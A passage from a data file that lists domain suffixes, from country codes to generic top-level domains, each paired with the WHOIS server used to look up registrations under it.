ve:whois.nic.ve, 156 | vg:whois.adamsnames.tc, 157 | yu:whois.ripe.net, 158 | ng:whois.nic.net.ng 159 | limited:whois.donuts.co 160 | med.ht:whois.nic.ht 161 | idv.tw:whois.twnic.net.tw 162 | nsw.au:whois.aunic.net 163 | isa.us:whois.nic.us 164 | paris:whois-paris.nic.fr 165 | org.lv:whois.nic.lv 166 | art.ht:whois.nic.ht 167 | sshn.se:whois.nic-se.se 168 | sch.ae:whois.aeda.net.ae 169 | tickets:whois.donuts.co 170 | info.ht:whois.nic.ht 171 | imb.br:whois.nic.br 172 | soros.al:whois.ripe.net 173 | direct:whois.comlaude.com 174 | tires:whois.donuts.co 175 | mil.se:whois.nic-se.se 176 | esp.br:whois.nic.br 177 | pro.ae:whois.aeda.net.ae 178 | asia:whois.nic.asia 179 | 000.nl:whois.domain-registry.nl 180 | supplies:whois.donuts.co 181 | net:whois.iana.org 182 | mod.uk:whois.nic.uk 183 | net.ru:whois.tcinet.ru 184 | tm.ro:whois.rotld.ro 185 | studio:whois.donuts.co 186 | iz.hr:whois.dns.hr 187 | forum:whois.donuts.co 188 | auction:whois.donuts.co 189 | wy.us:whois.nic.us 190 | nom.fr:whois.nic.fr 191 | credit:whois.donuts.co 192 | sch.sa:saudinic.net.sa 193 | mil.ac:whois.nic.ac 194 | mil.ae:whois.aeda.net.ae 195 | gob.hn:whois2.afilias-grs.net 196 | net.ng:whois.nic.net.ng 197 | fot.br:whois.nic.br 198 | org.ma:whois.iam.net.ma 199 | net.nz:whois.srs.net.nz 200 | net.li:whois.nic.li 201 | hospital:whois.donuts.co 202 | pro.om:whois.registry.om 203 | fed.us:whois.nic.us 204 | glass:whois.donuts.co 205 | berlin:whois.nic.berlin 206 | net.ec:whois.nic.ec 207 | me:whois.nic.me 208 | md:whois.nic.md 209 | mg:whois.nic.mg 210 | ma:whois.iam.net.ma 211 | ml:whois.dot.ml 212 | mo:whois.monic.mo 213 | mk:whois.ripe.net 214 | mt:whois.ripe.net 215 | ms:whois.nic.ms 216 | in.th:whois.thnic.net 217 | mx:whois.nic.mx 218 | mz:whois.nic.mz 219 | wang:whois.nic.wang 220 | estate:whois.name.com 221 | odo.br:whois.nic.br 222 | dpn.br:whois.nic.br 223 | net.lv:whois.nic.lv 224 | org.se:whois.nic-se.se 225 | org.co:whois.nic.co 226 | org.cn:whois.cnnic.net.cn 227 | org.ch:whois.nic.ch 228 | bj.cn:whois.cnnic.net.cn 229 | travel:whois.nic.travel 230 | org.cd:whois.nic.cd 231 | ct.us:whois.nic.us 232 | hot:whois.donuts.co 233 | org.cy:whois.ripe.net 234 | boats:whois.donuts.co 235 | poker:whois.donuts.co 236 | beauty:whois.donuts.co 237 | law:whois.donuts.co 238 | go.ug:whois.co.ug 239 | me.uk:whois.nic.uk 240 | biz.cy:whois.ripe.net 241 | co.bw:whois.nic.net.bw 242 | bel.tr:whois.nic.tr 243 | reklam.hu:whois.nic.hu 244 | suli.hu:whois.nic.hu 245 | kommune.no:whois.norid.no 246 | info.cy:whois.ripe.net 247 | nhs.uk:whois.nic.uk 248 | realestate:whois.donuts.co 249 | fashion:whois.donuts.co 250 | lakas.hu:whois.nic.hu 251 | co.cc:whois.nic.cc 252 | gouv.fr:whois.nic.fr 253 | ca.us:whois.nic.us 254 | luxury:whois.donuts.co 255 | k12.il:whois.isoc.org.il 256 | net.ma:whois.iam.net.ma 257 | org.ru:whois.tcinet.ru 258 | net.mo:whois.monic.mo 259 | sd.cn:whois.cnnic.net.cn 260 | net.mt:whois.ripe.net 261 | net.mx:whois.nic.mx 262 | org.ro:whois.rotld.ro 263 | camp:whois.donuts.co 264 | tech:whois.donuts.co 265 | radio:whois.donuts.co 266 | solutions:whois.comlaude.com 267 | edu.mt:whois.ripe.net 268 | edu.mx:whois.nic.mx 269 | edu.mg:whois.nic.mg 270 | com.pl:whois.dns.pl 271 | com.mu:whois.nic.mu 272 | edu.mo:whois.monic.mo 273 | com.pf:whois.registry.pf 274 | dm:whois.nic.cx 275 | dk:whois.dk-hostmaster.dk 276 | watch:whois.uniregistrar.com 277 | rec.br:whois.nic.br 278 | dz:whois.nic.dz 279 | museum.no:whois.norid.no 280 | wedding:whois.donuts.co 281 | report:whois.donuts.co 282 | org.dm:whois.nic.cx 283 | org.dz:whois.nic.dz 284 | coop.ht:whois.nic.ht 285 | go.id:whois.pandi.or.id 286 | best:whois.nic.best 287 | voyage:whois.donuts.co 288 | vt.us:whois.nic.us 289 | name.cy:whois.ripe.net 290 | wf:whois.nic.wf 291 | bargains:whois.comlaude.com 292 | cri.nz:whois.srs.net.nz 293 | ws:whois.website.ws 294 | wtf:whois.1api.net 295 | news:whois.donuts.co 296 | kitchen:whois.name.com 297 | mi.th:whois.thnic.net 298 | com.mo:whois.monic.mo 299 | ne.tz:whois.tznic.or.tz 300 | games:whois.donuts.co 301 | com:whois.iana.org 302 | tozsde.hu:whois.nic.hu 303 | org.ee:whois.tld.ee 304 | firm.ht:whois.nic.ht 305 | bingo:whois.donuts.co 306 | g12.br:whois.nic.br 307 | pp.ru:whois.tcinet.ru 308 | website:whois.donuts.co 309 | gov.tw:whois.twnic.net.tw 310 | gov.tr:whois.nic.tr 311 | net.pr:whois.nic.pr 312 | forum.hu:whois.nic.hu 313 | mil.co:whois.nic.co 314 | mil.az:whois.ripe.net 315 | net.pl:whois.dns.pl 316 | gov.tn:whois.ati.tn 317 | gov.to:whois.tonic.to 318 | com.au:whois.aunic.net 319 | adv.br:whois.nic.br 320 | az.us:whois.nic.us 321 | property:whois.donuts.co 322 | iq:whois.cmc.iq 323 | is:whois.isnic.is 324 | ir:whois.nic.ir 325 | it:whois.nic.it 326 | priv.no:whois.norid.no 327 | im:whois.nic.im 328 | il:whois.isoc.org.il 329 | in:whois.inregistry.net 330 | org.sg:whois.nic.net.sg 331 | net.lu:whois.restena.lu 332 | ie:whois.domainregistry.ie 333 | id:whois.pandi.or.id 334 | org.sa:saudinic.net.sa 335 | memorial:whois.donuts.co 336 | nic.in:whois.inregistry.net 337 | ebiz.tw:whois.twnic.net.tw 338 | naturbruksgymn.se:whois.nic-se.se 339 | sh.cn:whois.cnnic.net.cn 340 | ac.be:whois.dns.be 341 | ingatlan.hu:whois.nic.hu 342 | hi.us:whois.nic.us 343 | co.yu:whois.ripe.net 344 | web.tr:whois.nic.tr 345 | gen.in:whois.inregistry.net 346 | claims:whois.donuts.co 347 | investments:whois.donuts.co 348 | juegos:whois.donuts.co 349 | nm.cn:whois.cnnic.net.cn 350 | museum.om:whois.registry.om 351 | com.al:whois.ripe.net 352 | ny.us:whois.nic.us 353 | com.ai:whois.ai 354 | com.af:whois.nic.af 355 | com.ag:whois.nic.ag 356 | org.ec:whois.nic.ec 357 | com.ac:whois.nic.ac 358 | org.eg:whois.ripe.net 359 | com.tn:whois.ati.tn 360 | com.aw:whois.nic.aw 361 | org.es:whois.nic.es 362 | vin:whois.donuts.co 363 | edu.tw:whois.twnic.net.tw 364 | ppg.br:whois.nic.br 365 | or.at:whois.nic.at 366 | 999.nl:whois.domain-registry.nl 367 | oz.au:whois.aunic.net 368 | security:whois.donuts.co 369 | ah.cn:whois.cnnic.net.cn 370 | attorney:whois.donuts.co 371 | productions:whois.comlaude.com 372 | gov.eg:whois.ripe.net 373 | or.kr:whois.kr 374 | energy:whois.donuts.co 375 | marketing:whois.donuts.co 376 | name.tr:whois.nic.tr 377 | discount:whois.comlaude.com 378 | properties:whois.donuts.co 379 | vatican.va:whois.ripe.net 380 | upt.al:whois.ripe.net 381 | com.ng:whois.nic.net.ng 382 | ma.us:whois.nic.us 383 | plus:whois.goaustraliadomains.com 384 | com.sa:saudinic.net.sa 385 | com.sb:whois.nic.net.sb 386 | com.sc:whois2.afilias-grs.net 387 | com.sg:whois.nic.net.sg 388 | consulting:whois.donuts.co 389 | mba:Whois.gocanadadomains.com 390 | 2000.hu:whois.nic.hu 391 | gov.ua:whois.ua 392 | mil.lt:whois.domreg.lt 393 | mil.lu:whois.restena.lu 394 | biz.az:whois.ripe.net 395 | viajes:whois.donuts.co 396 | support:whois.comlaude.com 397 | tennis:whois.donuts.co 398 | ngo.pl:whois.dns.pl 399 | city.hu:whois.nic.hu 400 | asn.au:whois.aunic.net 401 | msk.ru:whois.tcinet.ru 402 | solar:whois.epik.com 403 | co.in:whois.inregistry.net 404 | gov.gr:whois.ripe.net 405 | gov.gi:whois2.afilias-grs.net 406 | tel.tr:whois.nic.tr 407 | gov.ge:whois.ripe.net 408 | ac.cy:whois.ripe.net 409 | sale:whois.donuts.co 410 | ac.cn:whois.cnnic.net.cn 411 | pp.az:whois.ripe.net 412 | pub.sa:saudinic.net.sa 413 | nl:whois.domain-registry.nl 414 | no:whois.norid.no 415 | na:whois.na-nic.com.na 416 | nc:whois.nc 417 | nf:whois.nic.nf 418 | ng:whois.nic.net.ng 419 | nz:whois.srs.net.nz 420 | nu:whois.nic.nu 421 | ky.us:whois.nic.us 422 | firm.in:whois.inregistry.net 423 | football:whois.donuts.co 424 | diet:whois.donuts.co 425 | muni.il:whois.isoc.org.il 426 | press.se:whois.nic-se.se 427 | phone:whois.donuts.co 428 | ind.br:whois.nic.br 429 | pp.se:whois.nic-se.se 430 | news.hu:whois.nic.hu 431 | coach:whois.donuts.co 432 | global:whois.donuts.co 433 | vet:whois.donuts.co 434 | iwi.nz:whois.srs.net.nz 435 | co.ma:whois.iam.net.ma 436 | nh.us:whois.nic.us 437 | mat.br:whois.nic.br 438 | gouv.ht:whois.nic.ht 439 | co.mu:whois.nic.mu 440 | geek.nz:whois.srs.net.nz 441 | org.tr:whois.nic.tr 442 | gen.tr:whois.nic.tr 443 | org.tw:whois.twnic.net.tw 444 | net.kz:whois.nic.kz 445 | org.tn:whois.ati.tn 446 | mc:whois.ripe.net 447 | mi.us:whois.nic.us 448 | il.us:whois.nic.us 449 | com.ro:whois.rotld.ro 450 | or.jp:whois.jprs.jp 451 | qh.cn:whois.cnnic.net.cn 452 | com.ru:whois.tcinet.ru 453 | hl.cn:whois.cnnic.net.cn 454 | med.pro:whois.registrypro.pro 455 | co.jp:whois.jprs.jp 456 | edu.ky:whois.kyregistry.ky 457 | uniti.al:whois.ripe.net 458 | tv.br:whois.nic.br 459 | lanarb.se:whois.nic-se.se 460 | nx.cn:whois.cnnic.net.cn 461 | baseball:whois.donuts.co 462 | tv.bo:whois.nic.bo 463 | institute:whois.comlaude.com 464 | nj.us:whois.nic.us 465 | domains:whois.comlaude.com 466 | love:whois.donuts.co 467 | gob.mx:whois.nic.mx 468 | gov.dm:whois.nic.cx 469 | edu.cn:whois.cnnic.net.cn 470 | market:whois.donuts.co 471 | biz.om:whois.registry.om 472 | idn.sg:whois.nic.net.sg 473 | name.az:whois.ripe.net 474 | name.ae:whois.aeda.net.ae 475 | lg.jp:whois.jprs.jp 476 | live:whois.donuts.co 477 | org.gr:whois.ripe.net 478 | today:whois.donuts.co 479 | club:whois.101domain.com 480 | ooo:whois.nic.ooo 481 | gv.at:whois.nic.at 482 | realty:whois.donuts.co 483 | cat:whois.cat 484 | reviews:whois.donuts.co 485 | idrett.no:whois.norid.no 486 | net.tw:whois.twnic.net.tw 487 | eng.br:whois.nic.br 488 | ac.ru:whois.tcinet.ru 489 | clothing:whois.comlaude.com 490 | nd.us:whois.nic.us 491 | info.ve:whois.nic.ve 492 | ne.jp:whois.jprs.jp 493 | mil.mg:whois.nic.mg 494 | ok.us:whois.nic.us 495 | data:whois.donuts.co 496 | sx:whois.sx 497 | su:whois.tcinet.ru 498 | st:whois.nic.st 499 | sk:whois.sk-nic.sk 500 | si:whois.arnes.si 501 | so:whois.nic.so 502 | sm:whois.nic.sm 503 | sc:whois2.afilias-grs.net 504 | sb:whois.nic.net.sb 505 | sa:saudinic.net.sa 506 | sg:whois.nic.net.sg 507 | se:whois.nic-se.se 508 | org.uy:nic.uy 509 | shoes:whois.comlaude.com 510 | net.je:whois.je 511 | priv.hu:whois.nic.hu 512 | gov.uk:whois.ja.net 513 | org.uk:whois.nic.uk 514 | net.tn:whois.ati.tn 515 | org.ua:whois.ua 516 | wv.us:whois.nic.us 517 | fnd.br:whois.nic.br 518 | xyz:whois.nic.xyz 519 | js.cn:whois.cnnic.net.cn 520 | finance:whois.comlaude.com 521 | name:whois.nic.name 522 | art.pl:whois.dns.pl 523 | per.sg:whois.nic.net.sg 524 | ee:whois.tld.ee 525 | eg:whois.ripe.net 526 | ac.th:whois.thnic.net 527 | ec:whois.nic.ec 528 | eu:whois.eu 529 | es:whois.nic.es 530 | com.ch:whois.nic.ch 531 | living:whois.donuts.co 532 | com.cn:whois.cnnic.net.cn 533 | com.cd:whois.nic.cd 534 | com.cy:whois.ripe.net 535 | info.ro:whois.rotld.ro 536 | org.gg:whois.gg 537 | org.ge:whois.ripe.net 538 | org.gi:whois2.afilias-grs.net 539 | cars:whois.donuts.co 540 | school.nz:whois.srs.net.nz 541 | org:whois.pir.org 542 | care:whois.eurodns.com 543 | ks.us:whois.nic.us 544 | training:whois.comlaude.com 545 | co.nz:whois.srs.net.nz 546 | kommunalforbund.se:whois.nic-se.se 547 | place:whois.donuts.co 548 | forsale:whois.donuts.co 549 | nic.im:whois.nic.im 550 | gx.cn:whois.cnnic.net.cn 551 | ong:whois.publicinterestregistry.net 552 | vote:whois.donuts.co 553 | city:whois.eurodns.com 554 | hb.cn:whois.cnnic.net.cn 555 | cng.br:whois.nic.br 556 | com.ua:whois.ua 557 | flowers:whois.donuts.co 558 | edu.ht:whois.nic.ht 559 | edu.hn:whois2.afilias-grs.net 560 | edu.hk:whois.hknic.net.hk 561 | cards:whois.donuts.co 562 | org.sc:whois2.afilias-grs.net 563 | com.dz:whois.nic.dz 564 | mil.no:whois.norid.no 565 | pro:whois.registrypro.pro 566 | mil.nz:whois.srs.net.nz 567 | rent:whois.donuts.co 568 | far.br:whois.nic.br 569 | edu.tr:whois.nic.tr 570 | online:whois.donuts.co 571 | govt.nz:whois.srs.net.nz 572 | org.ve:whois.nic.ve 573 | edu.co:whois.nic.co 574 | gz.cn:whois.cnnic.net.cn 575 | nel.uk:whois.nic.uk 576 | ut.us:whois.nic.us 577 | fhsk.se:whois.nic-se.se 578 | tj.cn:whois.cnnic.net.cn 579 | shop:whois.donuts.co 580 | show:whois.name.com 581 | cheap:whois.comlaude.com 582 | info.ec:whois.nic.ec 583 | szex.hu:whois.nic.hu 584 | hockey:whois.donuts.co 585 | co.hu:whois.nic.hu 586 | konyvelo.hu:whois.nic.hu 587 | nom.mg:whois.nic.mg 588 | wiki:whois.nic.wiki 589 | int.az:whois.ripe.net 590 | college:whois.donuts.co 591 | surgery:whois.donuts.co 592 | gov.ch:whois.nic.ch 593 | mortgage:whois.donuts.co 594 | id.us:whois.nic.us 595 | diamonds:whois.namecheap.com 596 | co.om:whois.registry.om 597 | srv.br:whois.nic.br 598 | herad.no:whois.norid.no 599 | net.ir:whois.nic.ir 600 | jp:whois.jprs.jp 601 | net.id:whois.pandi.or.id 602 | net.il:whois.isoc.org.il 603 | je:whois.je 604 | net.in:whois.inregistry.net 605 | med.br:whois.nic.br 606 | coupons:whois.comlaude.com 607 | ac.ae:whois.aeda.net.ae 608 | rugby:whois.donuts.co 609 | ac.at:whois.nic.at 610 | ens.tn:whois.ati.tn 611 | asso.mc:whois.ripe.net 612 | com.tw:whois.twnic.net.tw 613 | net.im:whois.nic.im 614 | edu.in:whois.inregistry.net 615 | shopping:whois.donuts.co 616 | aero:whois.aero 617 | casa:whois.donuts.co 618 | com.br:whois.nic.br 619 | org.ht:whois.nic.ht 620 | org.hu:whois.nic.hu 621 | org.hn:whois2.afilias-grs.net 622 | com.bo:whois.nic.bo 623 | nt.ro:whois.rotld.ro 624 | national-library-scotland.uk:whois.nic.uk 625 | doctor:whois.uniregistrar.com 626 | food:whois.donuts.co 627 | net.br:whois.nic.br 628 | jogasz.hu:whois.nic.hu 629 | sch.om:whois.registry.om 630 | events:whois.comlaude.com 631 | dc.us:whois.nic.us 632 | edu.gr:whois.ripe.net 633 | edu.es:whois.nic.es 634 | edu.ge:whois.ripe.net 635 | bbs.tr:whois.nic.tr 636 | la.us:whois.nic.us 637 | edu.gi:whois2.afilias-grs.net 638 | csiro.au:whois.aunic.net 639 | theater:whois.comlaude.com 640 | tm.mc:whois.ripe.net 641 | tm.mg:whois.nic.mg 642 | www.ro:whois.rotld.ro 643 | bmd.br:whois.nic.br 644 | blog:whois.donuts.co 645 | careers:whois.comlaude.com 646 | info.tn:whois.ati.tn 647 | lanbib.se:whois.nic-se.se 648 | edu.ua:whois.ua 649 | edu.uy:nic.uy 650 | gub.uy:nic.uy 651 | ga.us:whois.nic.us 652 | al.us:whois.nic.us 653 | tur.br:whois.nic.br 654 | apartments:whois.donuts.co 655 | co.uk:whois.nic.uk 656 | hotel.hu:whois.nic.hu 657 | mo.us:whois.nic.us 658 | net.hk:whois.hknic.net.hk 659 | hn.cn:whois.cnnic.net.cn 660 | tube:whois.donuts.co 661 | legal:whois.donuts.co 662 | nom.pe:kero.yachay.pe 663 | org.ae:whois.aeda.net.ae 664 | business:whois.donuts.co 665 | broker:whois.donuts.co 666 | om:whois.registry.om 667 | org.ac:whois.nic.ac 668 | inf.br:whois.nic.br 669 | com.es:whois.nic.es 670 | org.im:whois.nic.im 671 | com.ec:whois.nic.ec 672 | org.in:whois.inregistry.net 673 | com.ee:whois.tld.ee 674 | fish:whois.uniregistrar.com 675 | com.uy:nic.uy 676 | av.tr:whois.nic.tr 677 | eti.br:whois.nic.br 678 | fylkesbibl.no:whois.norid.no 679 | org.az:whois.ripe.net 680 | builders:whois.donuts.co 681 | video.hu:whois.nic.hu 682 | ac:whois.nic.ac 683 | ae:whois.aeda.net.ae 684 | ad:whois.ripe.net 685 | ag:whois.nic.ag 686 | af:whois.nic.af 687 | ai:whois.ai 688 | edu.dz:whois.nic.dz 689 | am:whois.amnic.net 690 | al:whois.ripe.net 691 | as:whois.nic.as 692 | au:whois.aunic.net 693 | at:whois.nic.at 694 | aw:whois.nic.aw 695 | ax:whois.ax 696 | az:whois.ripe.net 697 | edu.dm:whois.nic.cx 698 | music.mobi:whois.dotmobiregistry.net 699 | co.th:whois.thnic.net 700 | creditcard:whois.donuts.co 701 | name.pr:whois.nic.pr 702 | co.tz:whois.tznic.or.tz 703 | gifts:whois.comlaude.com 704 | nom.br:whois.nic.br 705 | ekloges.cy:whois.ripe.net 706 | photos:whois.donuts.co 707 | directory:whois.comlaude.com 708 | hamburg:whois.nic.hamburg 709 | tours:whois.donuts.co 710 | mil.pe:kero.yachay.pe 711 | mil.hn:whois2.afilias-grs.net 712 | game.tw:whois.twnic.net.tw 713 | tz:whois.tznic.or.tz 714 | org.mg:whois.nic.mg 715 | immo:whois.donuts.co 716 | tv:whois.enom.com 717 | tw:whois.twnic.net.tw 718 | tr:whois.nic.tr 719 | med.om:whois.registry.om 720 | tn:whois.ati.tn 721 | to:whois.tonic.to 722 | tm:whois.nic.tm 723 | th:whois.thnic.net 724 | tf:whois.nic.tf 725 | health:whois.donuts.co 726 | cnt.br:whois.nic.br 727 | tienda:whois.donuts.co 728 | dr.tr:whois.nic.tr 729 | fan:whois.donuts.co 730 | org.mo:whois.monic.mo 731 | gov.kz:whois.nic.kz 732 | ed.jp:whois.jprs.jp 733 | ro:whois.rotld.ro 734 | biz.pr:whois.nic.pr 735 | biz.pl:whois.dns.pl 736 | org.mt:whois.ripe.net 737 | tel:whois.nic.tel 738 | com.bz:whois.belizenic.bz 739 | design:whois.donuts.co 740 | lawyer:whois.donuts.co 741 | org.mx:whois.nic.mx 742 | prd.fr:whois.nic.fr 743 | lel.br:whois.nic.br 744 | racing:whois.donuts.co 745 | sc.cn:whois.cnnic.net.cn 746 | jet.uk:whois.nic.uk 747 | jor.br:whois.nic.br 748 | com.co:whois.nic.co 749 | va.us:whois.nic.us 750 | cpa.pro:whois.registrypro.pro 751 | family:whois.donuts.co 752 | vip:whois.donuts.co 753 | toys:whois.comlaude.com 754 | co.ir:whois.nic.ir 755 | co.id:whois.pandi.or.id 756 | co.il:whois.isoc.org.il 757 | co.im:whois.nic.im 758 | casino.hu:whois.nic.hu 759 | net.gr:whois.ripe.net 760 | mil.tw:whois.twnic.net.tw 761 | mil.tr:whois.nic.tr 762 | md.us:whois.nic.us 763 | pro.ht:whois.nic.ht 764 | net.gg:whois.gg 765 | net.ge:whois.ripe.net 766 | town:whois.donuts.co 767 | sucks:whois.donuts.co 768 | me.us:whois.nic.us 769 | rec.ro:whois.rotld.ro 770 | etc.br:whois.nic.br 771 | com.ve:whois.nic.ve 772 | gov.al:whois.ripe.net 773 | am.br:whois.nic.br 774 | fr:whois.nic.fr 775 | fi:whois.fi 776 | fo:whois.nic.fo 777 | icnet.uk:whois.nic.uk 778 | net.af:whois.nic.af 779 | he.cn:whois.cnnic.net.cn 780 | net.ky:whois.kyregistry.ky 781 | media:whois.comlaude.com 782 | com.dm:whois.nic.cx 783 | org.je:whois.je 784 | tourism.tn:whois.ati.tn 785 | gov.hk:whois.hknic.net.hk 786 | help:whois.donuts.co 787 | psi.br:whois.nic.br 788 | asn.lv:whois.nic.lv 789 | broadway:whois.donuts.co 790 | style:whois.donuts.co 791 | sch.ir:whois.nic.ir 792 | yn.cn:whois.cnnic.net.cn 793 | soccer:whois.donuts.co 794 | ceo:whois.nic.ceo 795 | co.je:whois.je 796 | edu.eg:whois.ripe.net 797 | edu.ec:whois.nic.ec 798 | co.ug:whois.co.ug 799 | co.us:whois.nic.us 800 | net.ac:whois.nic.ac 801 | firm.ro:whois.rotld.ro 802 | perso.ht:whois.nic.ht 803 | insurance:whois.donuts.co 804 | dni.us:whois.nic.us 805 | adult.ht:whois.nic.ht 806 | nsn.us:whois.nic.us 807 | mod.gi:whois2.afilias-grs.net 808 | art.br:whois.nic.br 809 | pub:whois.unitedtld.com 810 | mil.in:whois.inregistry.net 811 | ecn.br:whois.nic.br 812 | edu.sa:saudinic.net.sa 813 | edu.sc:whois2.afilias-grs.net 814 | edu.sb:whois.nic.net.sb 815 | edu.sg:whois.nic.net.sg 816 | gov.mo:whois.monic.mo 817 | mil.uk:whois.nic.uk 818 | qld.au:whois.aunic.net 819 | florist:whois.101domain.com 820 | mil.uy:nic.uy 821 | nom.ro:whois.rotld.ro 822 | store:whois.donuts.co 823 | lease:whois.epik.com 824 | idv.hk:whois.hknic.net.hk 825 | wa.us:whois.nic.us 826 | dentist:whois.donuts.co 827 | ln.cn:whois.cnnic.net.cn 828 | film.hu:whois.nic.hu 829 | zlg.br:whois.nic.br 830 | qsl.br:whois.nic.br 831 | kids.us:whois.nic.us 832 | com.gr:whois.ripe.net 833 | maison:whois.donuts.co 834 | com.ge:whois.ripe.net 835 | pol.tr:whois.nic.tr 836 | rel.ht:whois.nic.ht 837 | singles:whois.donuts.co 838 | ac.jp:whois.jprs.jp 839 | services:whois.comlaude.com 840 | kg:whois.domain.kg 841 | ke:whois.kenic.or.ke 842 | mobile:whois.donuts.co 843 | ki:whois.nic.ki 844 | futbol:whois.donuts.co 845 | kr:whois.kr 846 | org.yu:whois.ripe.net 847 | kz:whois.nic.kz 848 | ky:whois.kyregistry.ky 849 | bzh:whois-bzh.nic.fr 850 | ato.br:whois.nic.br 851 | edu.kz:whois.nic.kz 852 | cruises:whois.donuts.co 853 | edu.br:whois.nic.br 854 | edu.bo:whois.nic.bo 855 | conf.lv:whois.nic.lv 856 | co.ve:whois.nic.ve 857 | condos:whois.donuts.co 858 | plc.uk:whois.nic.uk 859 | flights:whois.donuts.co 860 | asso.ht:whois.nic.ht 861 | club.tw:whois.twnic.net.tw 862 | gov.ky:whois.kyregistry.ky 863 | res.in:whois.inregistry.net 864 | weather.mobi:whois.dotmobiregistry.net 865 | net.sg:whois.nic.net.sg 866 | act.au:whois.aunic.net 867 | parti.se:whois.nic-se.se 868 | psc.br:whois.nic.br 869 | expert:whois.udag.net 870 | movie:Whois.gomontenegrodomains.com 871 | edu.pe:kero.yachay.pe 872 | edu.pl:whois.dns.pl 873 | ltd.gi:whois2.afilias-grs.net 874 | gov.it:whois.nic.it 875 | gov.ir:whois.nic.ir 876 | komvux.se:whois.nic-se.se 877 | gov.ie:whois.domainregistry.ie 878 | info.tr:whois.nic.tr 879 | gov.in:whois.inregistry.net 880 | gov.im:whois.nic.im 881 | gov.il:whois.isoc.org.il 882 | pol.dz:whois.nic.dz 883 | slg.br:whois.nic.br 884 | co.ag:whois.nic.ag 885 | restaurant:whois.comlaude.com 886 | supply:whois.donuts.co 887 | info.az:whois.ripe.net 888 | tm.se:whois.nic-se.se 889 | sd.us:whois.nic.us 890 | church:whois.donuts.co 891 | parliament.uk:whois.nic.uk 892 | nat.tn:whois.ati.tn 893 | pr:whois.nic.pr 894 | pw:whois.hkdns.hk 895 | nom.ad:whois.ripe.net 896 | nom.ag:whois.nic.ag 897 | pf:whois.registry.pf 898 | ltd.uk:whois.nic.uk 899 | med.sa:saudinic.net.sa 900 | pvt.ge:whois.ripe.net 901 | fhv.se:whois.nic-se.se 902 | sa.au:whois.aunic.net 903 | guide:whois.donuts.co 904 | co.kr:whois.kr 905 | ind.tn:whois.ati.tn 906 | org.ky:whois.kyregistry.ky 907 | ia.us:whois.nic.us 908 | maori.nz:whois.srs.net.nz 909 | reisen:whois.udag.net 910 | cleaning:whois.donuts.co 911 | contractors:whois.donuts.co 912 | net.eg:whois.ripe.net 913 | mobi:whois.dotmobiregistry.net 914 | com.ht:whois.nic.ht 915 | com.hr:whois.dns.hr 916 | gripe:whois.name.com 917 | coop.br:whois.nic.br 918 | com.hn:whois2.afilias-grs.net 919 | mil.om:whois.registry.om 920 | com.hk:whois.hknic.net.hk 921 | net.pe:kero.yachay.pe 922 | com.gi:whois2.afilias-grs.net 923 | org.li:whois.nic.li 924 | biz:whois.neulevel.biz 925 | org.lu:whois.restena.lu 926 | tmp.br:whois.nic.br 927 | com.fr:whois.nic.fr 928 | gov.ng:whois.nic.net.ng 929 | tn.us:whois.nic.us 930 | tas.au:whois.aunic.net 931 | gov.dz:whois.nic.dz 932 | be:whois.dns.be 933 | bg:whois.register.bg 934 | ba:whois.ripe.net 935 | bo:whois.nic.bo 936 | bw:whois.nic.net.bw 937 | br:whois.nic.br 938 | by:whois.cctld.by 939 | bz:whois.belizenic.bz 940 | gov.cn:whois.cnnic.net.cn 941 | gov.ec:whois.nic.ec 942 | fin.ec:whois.nic.ec 943 | ac.tz:whois.tznic.or.tz 944 | info.pl:whois.dns.pl 945 | ac.com:whois.verisign-grs.com 946 | info.pr:whois.nic.pr 947 | net.co:whois.nic.co 948 | zj.cn:whois.cnnic.net.cn 949 | sx.cn:whois.cnnic.net.cn 950 | mn.us:whois.nic.us 951 | exposed:whois.donuts.co 952 | ak.us:whois.nic.us 953 | wi.us:whois.nic.us 954 | mil.kz:whois.nic.kz 955 | art.dz:whois.nic.dz 956 | mt.us:whois.nic.us 957 | net.ht:whois.nic.ht 958 | com.az:whois.ripe.net 959 | arts.ro:whois.rotld.ro 960 | info:whois.afilias.info 961 | uy:nic.uy 962 | uz:whois.cctld.uz 963 | us:whois.nic.us 964 | uk:whois.nic.uk 965 | ug:whois.co.ug 966 | ua:whois.ua 967 | bl.uk:whois.nic.uk 968 | pro.ec:whois.nic.ec 969 | eun.eg:whois.ripe.net 970 | sn.cn:whois.cnnic.net.cn 971 | engineering:whois.donuts.co 972 | associates:whois.comlaude.com 973 | chat:whois.donuts.co 974 | int.bo:whois.nic.bo 975 | codes:whois.comlaude.com 976 | net.hn:whois2.afilias-grs.net 977 | net.ve:whois.nic.ve 978 | games.hu:whois.nic.hu 979 | mil.eg:whois.ripe.net 980 | mil.ec:whois.nic.ec 981 | gs:whois.nic.gs 982 | gr:whois.ripe.net 983 | org.mk:whois.ripe.net 984 | gy:whois.registry.gy 985 | gg:whois.gg 986 | ge:whois.ripe.net 987 | go.jp:whois.jprs.jp 988 | gb:whois.ripe.net 989 | edu:whois.educause.net 990 | gm:whois.ripe.net 991 | gi:whois2.afilias-grs.net 992 | org.hk:whois.hknic.net.hk 993 | garden:whois.donuts.co 994 | wa.au:whois.aunic.net 995 | net.dm:whois.nic.cx 996 | deals:whois.comlaude.com 997 | net.dz:whois.nic.dz 998 | gmbh:whois.uniregistrar.com 999 | pro.br:whois.nic.br 1000 | video:whois.donuts.co 1001 | folkebibl.no:whois.norid.no 1002 | xz.cn:whois.cnnic.net.cn 1003 | tm.hu:whois.nic.hu 1004 | vet.br:whois.nic.br 1005 | degree:whois.donuts.co 1006 | exchange:whois.donuts.co 1007 | com.ky:whois.kyregistry.ky 1008 | com.kz:whois.nic.kz 1009 | sport.hu:whois.nic.hu 1010 | casino:whois.goaustraliadomains.com 1011 | gov.tv:whois.nic.tv 1012 | k12.tr:whois.nic.tr 1013 | ind.in:whois.inregistry.net 1014 | app:whois.donuts.co 1015 | pol.ht:whois.nic.ht 1016 | com.pr:whois.nic.pr 1017 | cloud:whois.nic.cloud 1018 | agr.br:whois.nic.br 1019 | sc.us:whois.nic.us 1020 | net.ua:whois.ua 1021 | sc.ug:whois.co.ug 1022 | tm.fr:whois.nic.fr 1023 | or.ug:whois.co.ug 1024 | or.us:whois.nic.us 1025 | baby:whois.donuts.co 1026 | gov.om:whois.registry.om 1027 | biz.tr:whois.nic.tr 1028 | asso.dz:whois.nic.dz 1029 | nc.us:whois.nic.us 1030 | law.pro:whois.registrypro.pro 1031 | gov.sg:whois.nic.net.sg 1032 | net.uk:whois.nic.uk 1033 | gov.sa:saudinic.net.sa 1034 | gov.sc:whois2.afilias-grs.net 1035 | gov.sb:whois.nic.net.sb 1036 | tax:whois.donuts.co 1037 | net.uy:nic.uy 1038 | gratis:whois.donuts.co 1039 | 